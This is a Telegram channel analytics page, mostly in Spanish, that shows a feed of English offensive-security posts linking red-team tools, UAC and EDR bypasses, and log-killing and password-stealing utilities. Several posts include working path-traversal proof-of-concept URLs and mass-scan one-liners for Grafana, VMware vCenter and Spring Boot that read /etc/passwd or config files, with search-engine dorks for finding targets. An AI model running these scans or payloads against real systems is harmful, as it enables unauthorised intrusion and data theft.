APT

Ir al canal en Telegram

This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat

Rusia45 554 Tecnologías y Aplicaciones8 834...

📈 Análisis del canal de Telegram APT

El canal APT (@apt_notes) en el segmento lingüístico de Inglés es un actor destacado. Actualmente la comunidad reúne a 14 682 suscriptores, ocupando la posición 8 834 en la categoría Tecnologías y Aplicaciones y el puesto 45 554 en la región Rusia.

📊 Métricas de audiencia y dinámica

Desde su creación el невідомо, el proyecto ha mostrado un crecimiento acelerado, reuniendo a 14 682 suscriptores.

Según los últimos datos del 13 junio, 2026, el canal mantiene una actividad estable. En los últimos 30 días la variación de miembros fue de 414, y en las últimas 24 horas de 17, conservando un alto alcance.

Estado de verificación: No verificado
Tasa de interacción (ER): El promedio de interacción de la audiencia es 50.76%. Durante las primeras 24 horas tras publicar, el contenido suele obtener N/A% de reacciones respecto al total de suscriptores.
Alcance de las publicaciones: Cada publicación recibe en promedio 7 449 visualizaciones. En el primer día suele acumular 0 visualizaciones.
Reacciones e interacción: La audiencia responde de forma activa: el promedio de reacciones por publicación es 20.

📝 Descripción y política de contenido

El autor describe el recurso como un espacio para expresar opiniones subjetivas:
“This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat”

Gracias a la alta frecuencia de actualizaciones (últimos datos recibidos el 14 junio, 2026), el canal mantiene la vigencia y un amplio alcance. La analítica demuestra que la audiencia interactúa activamente con el contenido, lo que lo convierte en un punto de referencia dentro de la categoría Tecnologías y Aplicaciones.

14 682

Suscriptores

+1724 horas

+1027 días

+41430 días

7 449

Visitas de la publicación

Sin datos24 horas

Sin datos48 horas

50.76%

Tasa de compromiso

Sin datos

Mensajes por día

Ads index

beta

Archivo de publicaciones

14 682

Grafana — Unauthorized Arbitrary Read File The latest Grafana unpatched 0Day LFI is now being actively exploited, it affects only Grafana 8.0+ Dorks: Shodan: title:"Grafana" Fofa.so: app="Grafana" ZoomEye: grafana PoC http://example.com/public/plugins/grafana-clock-panel/../../../../../../../etc/grafana/grafana.ini The "plugin-id" could be any plugin that exists in the system One line command to detect:

echo 'app="Grafana"' | fofa -fs 1000 | httpx -status-code -path "/public/plugins/graph/../../../../../../../../etc/passwd -mc 200 -ms 'root:x:0:0'

#grafana #lfi #bugbounty #pentest

14 682

PowerRunAsAttached This script allows to spawn a new interactive console as another user account in the same calling console (console instance/window). Example: Invoke-RunAsAttached -Username "darkcodersc" -Password "testmepliz" https://github.com/DarkCoderSc/PowerRunAsAttached #runas #powershell #pentest #tools

14 682

#bugbounty #hints

14 682

Design Issues Of Modern EDRs: Bypassing ETW-Based Solutions https://www.binarly.io/posts/Design_issues_of_modern_EDRs_bypassing_ETW-based_solutions/index.html #etw #redteam #blueteam #malware

14 682

Rodan Telecom Exploitation Framework Rodan is a telecom signaling exploitation framework created and maintained by Etisalat Egypt Research Labs (E-Labs). This framework includes a suite of modules that enable users to exploit vulnerabilities in the signaling protocols used by mobile operators. Rodan currently supports SS7 and Diameter protocols with plans to support GTP and SIP. https://github.com/Etisalat-Egypt/Rodan #telecom #ss7 #gtp #sip

14 682

Phant0m — Windows Event Log Killer Phant0m targets the Event Log service and finding the process responsible for the Event Log service, it detects and kills the threads responsible for the Event Log service. Thus, while the Event Log service appears to be running in the system (because Phant0m didn't kill process), it does not actually run (because Phant0m killed threads) and the system does not collect logs. https://github.com/hlldz/Phant0m #windows #events #log #killer

14 682

UAC bypass - DLL hijacking This is a PoC for bypassing UAC using DLL hijacking and abusing the "Trusted Directories" verification. https://github.com/SecuProject/DLLHijackingScanner #uac #bypass #dll #hijacking

14 682

jq + grep + fzf + curl = SharpCollection https://github.com/Flangvik/SharpCollection

alias SharpCollection='print -z `curl -sSL "https://api.github.com/repos/Flangvik/SharpCollection/git/trees/master?recursive=1" | jq -r ".tree[].path" | grep \\.exe | while read line; do echo "curl -sSL https://github.com/Flangvik/SharpCollection/raw/master/$line >"; done | fzf --tac`'

#csharp #collection #tooling

14 682

KeyHacks Keyhacks is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid. https://github.com/streaak/keyhacks #api #key #check #bugbounty

14 682

Exploiting A 16-Year-Old Vulnerability In The Linux 6pack Driver (CVE-2021-42008) CVE-2021-42008 is a Slab-Out-Of-Bounds Write vulnerability in the Linux 6pack driver caused by a missing size validation check in the decode_data function. A malicious input from a process with CAP_NET_ADMIN capability can lead to an overflow in the cooked_buf field of the sixpack structure, resulting in kernel memory corruption. This, if properly exploited, can lead to root access. https://syst3mfailure.io/sixpack-slab-out-of-bounds #linux #6pack #lpe #cve

14 682

OffensiveNim — PowerShell Using Nim to load the CLR and execute PowerShell without the need for PowerShell.exe, now with printing the output as well! https://github.com/Alh4zr3d/OffensiveNim/blob/master/src/execute_powershell_bin.nim #offensive #nim #powershell

14 682

Webapp Wordlists This repository contains wordlists for each versions of common web applications and content management systems (CMS). Each version contains a wordlist of all the files directories for this version. https://github.com/p0dalirius/webapp-wordlists #wordlist #cms #bugbounty

14 682

VMware vCenter (7.0.2.00100) — File Read + SSRF + XSS

cat target.txt| while read host do;do curl --insecure --path-as-is -s "$host/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd"| grep "root:x" && echo "$host Vulnerable";done

Shodan Dorks:

http.title:"ID_VC_Welcome"

Zoomeye Dorks:

app:"VMware vCenter"

https://github.com/l0ggg/VMware_vCenter #vmware #vcenter #bugbounty

14 682

Spring Boot Actuator — Logview Directory Traversal (CVE-2021-21234)

http://localhost:8887/manage/log/view?filename=/etc/passwd&base=../../../../../

Details: https://pyn3rd.github.io/2021/10/25/CVE-2021-21234-Spring-Boot-Actuator-Logview-Directory-Traversal/ #spring #actuator #cve #bugbounty

14 682

CHAPS — Configuration Hardening Assessment PowerShell Script CHAPS is a PowerShell script for checking system security settings where additional software and assessment tools, such as Microsoft Policy Analyzer, cannot be installed. The purpose of this script is to run it on a server or workstation to collect configuration information about that system. The information collected can then be used to provide recommendations (and references) to improve the security of the individual system and systemic issues within the organization's Windows environment. https://github.com/cutaway-security/chaps #powershell #hardening #assessment #blueteam

14 682

ManageEngine ADSelfService Plus — Authentication Bypass (CVE-2021-40539) Details: https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html Exploit: https://github.com/synacktiv/CVE-2021-40539 #adselfservice #cve #auth #bypass

14 682

How Windows Stops Kerberos Usernames Being Case Sensitive https://vbscrub.com/2021/11/29/how-windows-stops-kerberos-usernames-being-case-sensitive/ #kerberos #pre_auth #aes_salt

14 682

COM Objects P.1: The Hidden Backdoor in Your System A deeper dive into COM objects: how to utilize them in redteam engagements, and how to detect and protect organizations from them if you are on the blueteam side. https://medium.com/maltrak/com-objects-p-1-the-hidden-backdoor-in-your-system-947ac4285e85 #com #backdoor #redteam #blueteam

14 682

DetectionLabELK DetectionLabELK is the perfect lab to use if you would like to build effective detection capabilities. It has been designed with defenders in mind. Its primary purpose is to allow blueteams to quickly build a Windows domain that comes pre-loaded with security tooling and some best practices when it comes to system logging configurations. It can easily be modified to fit most needs or expanded to include additional hosts. https://github.com/cyberdefenders/DetectionLabELK #blueteam #detection #elk #lab

14 682

Winlogon Password Leaking The flow is: — user enters password — winlogon loads mpnotify.exe — mpnotify opens RPC channel — winlogon sends pass via RPC — mpnotify forwards to DLL — DLL stores it on disk https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy #winlogon #password #leak #redteam